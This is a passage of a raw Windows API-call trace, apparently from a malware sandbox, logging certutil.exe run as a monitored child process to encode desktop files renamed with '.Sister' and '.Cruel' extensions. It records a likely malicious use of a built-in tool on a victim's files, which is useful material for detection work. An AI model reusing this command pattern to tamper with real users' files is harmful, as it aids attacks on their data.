pvStructInfo=0x46bae7f3c0, pcbStructInfo=0x46bae7f3b4 | out: pvStructInfo=0x46bae7f3c0, pcbStructInfo=0x46bae7f3b4) returned 0 [0264.883] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x168663f5630 [0264.890] CryptMsgUpdate (hCryptMsg=0x168663f5630, pbData=0x16866411d20, cbData=0x12425, fFinal=1) returned 0 [0264.890] GetLastError () returned 0x8009310b [0264.890] CryptMsgClose (hCryptMsg=0x168663f5630) returned 1 [0264.890] GetFileAttributesExW (in: lpFileName="WDqhYWbTT.csv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv.sister"), fInfoLevelId=0x0, lpFileInformation=0x46bae7f3e0 | out: lpFileInformation=0x46bae7f3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a867490, ftCreationTime.dwHighDateTime=0x1d5e872, ftLastAccessTime.dwLowDateTime=0x264895d0, ftLastAccessTime.dwHighDateTime=0x1d5e870, ftLastWriteTime.dwLowDateTime=0x264895d0, ftLastWriteTime.dwHighDateTime=0x1d5e870, nFileSizeHigh=0x0, nFileSizeLow=0x12425)) returned 1 [0264.890] _vsnwprintf (in: _Buffer=0x46bae7f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0x46bae7f3d8 | out: _Buffer="359") returned 3 [0264.890] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x46bae7f1a0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0264.890] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x16866411c80 [0264.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.890] _vsnwprintf (in: _Buffer=0x46bae7e3d0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x46bae7f428 | out: _Buffer="Input Length = 74789") returned 20 [0264.890] GetFileType (hFile=0x50) returned 0x2 [0264.890] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x46bae7e3d0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x46bae7e384, lpReserved=0x0 | out: lpBuffer=0x46bae7e3d0*, lpNumberOfCharsWritten=0x46bae7e384*=0x14) returned 1 [0264.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.892] _vsnwprintf (in: _Buffer=0x46bae7e3d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x46bae7f428 | out: _Buffer="\n") returned 1 [0264.892] GetFileType (hFile=0x50) returned 0x2 [0264.892] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x46bae7e3d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x46bae7e384, lpReserved=0x0 | out: lpBuffer=0x46bae7e3d0*, lpNumberOfCharsWritten=0x46bae7e384*=0x1) returned 1 [0264.908] GetFileAttributesExW (in: lpFileName="WDqhYWbTT.csv.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv.cruel"), fInfoLevelId=0x0, lpFileInformation=0x46bae7f3e0 | out: lpFileInformation=0x46bae7f3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc87faca1, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xc87faca1, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc881823a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x191ee)) returned 1 [0264.908] _vsnwprintf (in: _Buffer=0x46bae7f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0x46bae7f3d8 | out: _Buffer="361") returned 3 [0264.908] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x46bae7f1a0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0264.908] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x168664119e0 [0264.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.908] _vsnwprintf (in: _Buffer=0x46bae7e3d0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x46bae7f428 | out: _Buffer="Output Length = 102894") returned 22 [0264.908] GetFileType (hFile=0x50) returned 0x2 [0264.908] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x46bae7e3d0*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x46bae7e384, lpReserved=0x0 | out: lpBuffer=0x46bae7e3d0*, lpNumberOfCharsWritten=0x46bae7e384*=0x16) returned 1 [0264.909] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.909] _vsnwprintf (in: _Buffer=0x46bae7e3d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x46bae7f428 | out: _Buffer="\n") returned 1 [0264.909] GetFileType (hFile=0x50) returned 0x2 [0264.909] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x46bae7e3d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x46bae7e384, lpReserved=0x0 | out: lpBuffer=0x46bae7e3d0*, lpNumberOfCharsWritten=0x46bae7e384*=0x1) returned 1 [0264.914] LocalFree (hMem=0x16866411d20) returned 0x0 [0264.914] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0264.914] _vsnwprintf (in: _Buffer=0x46bae7f448, _BufferCount=0xb, _Format="%d", _ArgList=0x46bae7f438 | out: _Buffer="2022") returned 4 [0264.914] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x46bae7f200, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0264.914] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x168663e8dc0 [0264.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.914] _vsnwprintf (in: _Buffer=0x46bae7e430, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x46bae7f488 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0264.914] GetFileType (hFile=0x50) returned 0x2 [0264.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x46bae7e430*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x46bae7e3e4, lpReserved=0x0 | out: lpBuffer=0x46bae7e430*, lpNumberOfCharsWritten=0x46bae7e3e4*=0x31) returned 1 [0264.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.914] _vsnwprintf (in: _Buffer=0x46bae7e430, _BufferCount=0x1ff, _Format="\n", _ArgList=0x46bae7f488 | out: _Buffer="\n") returned 1 [0264.914] GetFileType (hFile=0x50) returned 0x2 [0264.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x46bae7e430*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x46bae7e3e4, lpReserved=0x0 | out: lpBuffer=0x46bae7e430*, lpNumberOfCharsWritten=0x46bae7e3e4*=0x1) returned 1 [0264.918] LocalFree (hMem=0x0) returned 0x0 [0264.918] LocalFree (hMem=0x168663f03d0) returned 0x0 [0264.918] LocalFree (hMem=0x168663f30e0) returned 0x0 [0264.918] SetLastError (dwErrCode=0x80070716) [0264.918] _vsnwprintf (in: _Buffer=0x46bae7f4b8, _BufferCount=0xb, _Format="%d", _ArgList=0x46bae7f4a8 | out: _Buffer="511") returned 3 [0264.918] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x46bae7f270, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0264.918] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x168664118c0 [0264.918] PostQuitMessage (nExitCode=0) [0264.918] GetMessageW (in: lpMsg=0x46bae7fab0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x46bae7fab0) returned 0 [0264.918] LocalFree (hMem=0x168663fb560) returned 0x0 [0264.918] LocalFree (hMem=0x16866411680) returned 0x0 [0264.918] LocalFree (hMem=0x0) returned 0x0 [0264.919] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0264.919] GetLastError () returned 0x7e [0264.919] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0264.919] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0264.919] DllMain () returned 0x1 [0264.919] LocalFree (hMem=0x168663fba20) returned 0x0 [0264.919] LocalFree (hMem=0x168663ebd10) returned 0x0 [0264.919] LocalFree (hMem=0x16866411c80) returned 0x0 [0264.919] LocalFree (hMem=0x168664119e0) returned 0x0 [0264.919] LocalFree (hMem=0x168663e8dc0) returned 0x0 [0264.919] LocalFree (hMem=0x168664118c0) returned 0x0 [0264.919] LocalFree (hMem=0x168663f4190) returned 0x0 [0264.919] LocalFree (hMem=0x168663eb950) returned 0x0 [0264.919] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0264.919] GetLastError () returned 0x7e [0264.920] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0264.920] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0264.920] DllMain () returned 0x1 [0264.920] exit (_Code=0) Thread: id = 94 os_tid = 0x1148 Process: id = "35" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x3cf46000" os_pid = "0xd70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0xd28 [0266.993] GetStartupInfoW (in: lpStartupInfo=0x6021dffc30 | out: lpStartupInfo=0x6021dffc30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0266.997] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0267.036] __set_app_type (_Type=0x1) [0267.036] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0267.036] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0267.038] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0267.039] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0267.039] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0267.039] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0267.039] WerSetFlags () returned 0x0 [0267.040] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0267.040] __iob_func () returned 0x7ffcea2dea00 [0267.040] _fileno (_File=0x7ffcea2dea30) returned 1 [0267.040] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0267.040] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0267.041] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0267.041] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0267.041] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0267.041] GetConsoleOutputCP () returned 0x1b5 [0267.112] _vsnwprintf (in: _Buffer=0x6021dffba0, _BufferCount=0xb, _Format=".%d", _ArgList=0x6021dffac8 | out: _Buffer=".437") returned 4 [0267.112] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0267.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0267.112] GetFileType (hFile=0x50) returned 0x2 [0267.113] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0267.113] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0267.113] SetThreadUILanguage (LangId=0x0) returned 0x409 [0267.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0267.195] GetCommandLineW () returned="certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"" [0267.195] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x241d4d9bc20 [0267.195] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x241d4d95320 [0267.195] LocalFree (hMem=0x241d4d9bc20) returned 0x0 [0267.195] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x241d4d8b7c0 [0267.195] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x241d4d8b880 [0267.195] LocalFree (hMem=0x241d4d8b7c0) returned 0x0 [0267.195] LocalFree (hMem=0x241d4d95320) returned 0x0 [0267.196] LocalFree (hMem=0x0) returned 0x0 [0267.196] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0267.196] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0267.197] GetCommandLineW () returned="certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"" [0267.197] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x241d4d9b960 [0267.197] GetSystemTime (in: lpSystemTime=0x6021dff890 | out: lpSystemTime=0x6021dff890*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2e2)) [0267.197] SystemTimeToFileTime (in: lpSystemTime=0x6021dff890, lpFileTime=0x6021dff888 | out: lpFileTime=0x6021dff888) returned 1 [0267.197] FileTimeToLocalFileTime (in: lpFileTime=0x6021dff888, lpLocalFileTime=0x6021dff850 | out: lpLocalFileTime=0x6021dff850) returned 1 [0267.197] FileTimeToSystemTime (in: lpFileTime=0x6021dff850, lpSystemTime=0x6021dff5c0 | out: lpSystemTime=0x6021dff5c0) returned 1 [0267.197] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x6021dff5c0, lpFormat=0x0, lpDateStr=0x6021dff6d0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0267.197] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x6021dff5c0, lpFormat=0x0, lpTimeStr=0x6021dff5d0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0267.197] _vsnwprintf (in: _Buffer=0x6021dff5de, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x6021dff5a8 | out: _Buffer=" 41.738s") returned 8 [0267.197] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x241d4d9e470 [0267.198] SetLastError (dwErrCode=0x80070716) [0267.198] _vsnwprintf (in: _Buffer=0x6021dff658, _BufferCount=0xb, _Format="%d", _ArgList=0x6021dff648 | out: _Buffer="948") returned 3 [0267.198] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x6021dff410, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0267.198] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x241d4d9b8e0 [0267.198] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x241d4d909a0 [0267.198] LocalFree (hMem=0x241d4d9e470) returned 0x0 [0267.198] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6021dff900 | out: lpSystemTimeAsFileTime=0x6021dff900*(dwLowDateTime=0xc9df1559, dwHighDateTime=0x1d6141f)) [0267.198] GetLocalTime (in: lpSystemTime=0x6021dff938 | out: lpSystemTime=0x6021dff938*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2e3)) [0267.198] SystemTimeToFileTime (in: lpSystemTime=0x6021dff938, lpFileTime=0x6021dff910 | out: lpFileTime=0x6021dff910) returned 1 [0267.198] CompareFileTime (lpFileTime1=0x6021dff910, lpFileTime2=0x6021dff900) returned 1 [0267.199] _vsnwprintf (in: _Buffer=0x6021dff948, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x6021dff8d8 | out: _Buffer="GMT + 2.00") returned 10 [0267.199] LocalFree (hMem=0x241d4d9b960) returned 0x0 [0267.199] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0267.199] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0267.199] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0267.199] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0267.199] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0267.199] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x6021dff978 | out: _Buffer="10.0.15063.447") returned 14 [0267.199] GetACP () returned 0x4e4 [0267.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0267.199] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x241d4d9bf60 [0267.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x241d4d9bf60, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0267.200] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x241d4d9e7f0 [0267.200] _vsnwprintf (in: _Buffer=0x241d4d9e7f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x6021dff9c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0267.200] LocalFree (hMem=0x241d4d9bf60) returned 0x0 [0267.200] LocalFree (hMem=0x0) returned 0x0 [0267.200] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0267.200] GetACP () returned 0x4e4 [0267.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0267.200] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x241d4d9bcc0 [0267.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x241d4d9bcc0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0267.200] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x241d4d9e530 [0267.200] _vsnwprintf (in: _Buffer=0x241d4d9e530, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x6021dff9c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0267.200] LocalFree (hMem=0x241d4d9bcc0) returned 0x0 [0267.200] LocalFree (hMem=0x0) returned 0x0 [0267.201] GetACP () returned 0x4e4 [0267.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0267.201] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x241d4d9c000 [0267.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x241d4d9c000, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0267.201] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x241d4d9e4f0 [0267.201] _vsnwprintf (in: _Buffer=0x241d4d9e4f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x6021dff9f8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0267.201] LocalFree (hMem=0x241d4d9c000) returned 0x0 [0267.201] LocalFree (hMem=0x241d4d9e7f0) returned 0x0 [0267.201] LocalFree (hMem=0x241d4d9e530) returned 0x0 [0267.201] LocalFree (hMem=0x241d4d9e4f0) returned 0x0 [0267.201] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0267.201] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0267.201] GetStockObject (i=0) returned 0x900010 [0267.201] RegisterClassW (lpWndClass=0x6021dffb20) returned 0xc1a2 [0267.202] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0xd02c6 [0267.333] NtdllDefWindowProc_W () returned 0x0 [0267.333] NtdllDefWindowProc_W () returned 0x1 [0267.339] NtdllDefWindowProc_W () returned 0x0 [0267.349] UpdateWindow (hWnd=0xd02c6) returned 1 [0267.350] PostMessageW (hWnd=0xd02c6, Msg=0x400, wParam=0x0, lParam=0x241d4d8217e) returned 1 [0267.350] GetMessageW (in: lpMsg=0x6021dffb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6021dffb70) returned 1 [0267.350] TranslateMessage (lpMsg=0x6021dffb70) returned 0 [0267.350] DispatchMessageW (lpMsg=0x6021dffb70) returned 0x0 [0267.350] NtdllDefWindowProc_W () returned 0x0 [0267.350] GetMessageW (in: lpMsg=0x6021dffb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6021dffb70) returned 1 [0267.350] TranslateMessage (lpMsg=0x6021dffb70) returned 0 [0267.350] DispatchMessageW (lpMsg=0x6021dffb70) returned 0x0 [0267.350] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x241d4d92ea0 [0267.350] LocalAlloc (uFlags=0x0, uBytes=0x9e) returned 0x241d4d95e50 [0267.350] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0267.350] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0267.351] SetLastError (dwErrCode=0x80070716) [0267.351] _vsnwprintf (in: _Buffer=0x6021dff578, _BufferCount=0xb, _Format="%d", _ArgList=0x6021dff568 | out: _Buffer="465") returned 3 [0267.351] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x6021dff330, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0267.351] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x241d4d8bb50 [0267.351] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0267.351] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0267.351] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x6021dff310, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0267.351] GetLastError () returned 0xcb [0267.351] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0267.351] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0267.351] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0267.352] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0267.352] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0267.352] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0267.352] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0267.352] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0267.352] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0267.352] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0267.352] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0267.352] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0267.352] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0267.352] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0267.352] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0267.352] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0267.352] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0267.352] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0267.352] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0267.352] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0267.352] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0267.352] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x6021dfefd8 | out: phkResult=0x6021dfefd8*=0x23c) returned 0x0 [0267.352] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x241d4d93050 [0267.352] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x6021dff548, lpData=0x6021dff578, lpcbData=0x6021dff540*=0x4 | out: lpType=0x6021dff548*=0x0, lpData=0x6021dff578*=0x0, lpcbData=0x6021dff540*=0x4) returned 0x2 [0267.353] LocalFree (hMem=0x241d4d93050) returned 0x0 [0267.353] RegCloseKey (hKey=0x23c) returned 0x0 [0267.353] LocalFree (hMem=0x0) returned 0x0 [0267.353] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x241d4dae4f0 [0267.367] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0267.367] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0267.401] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 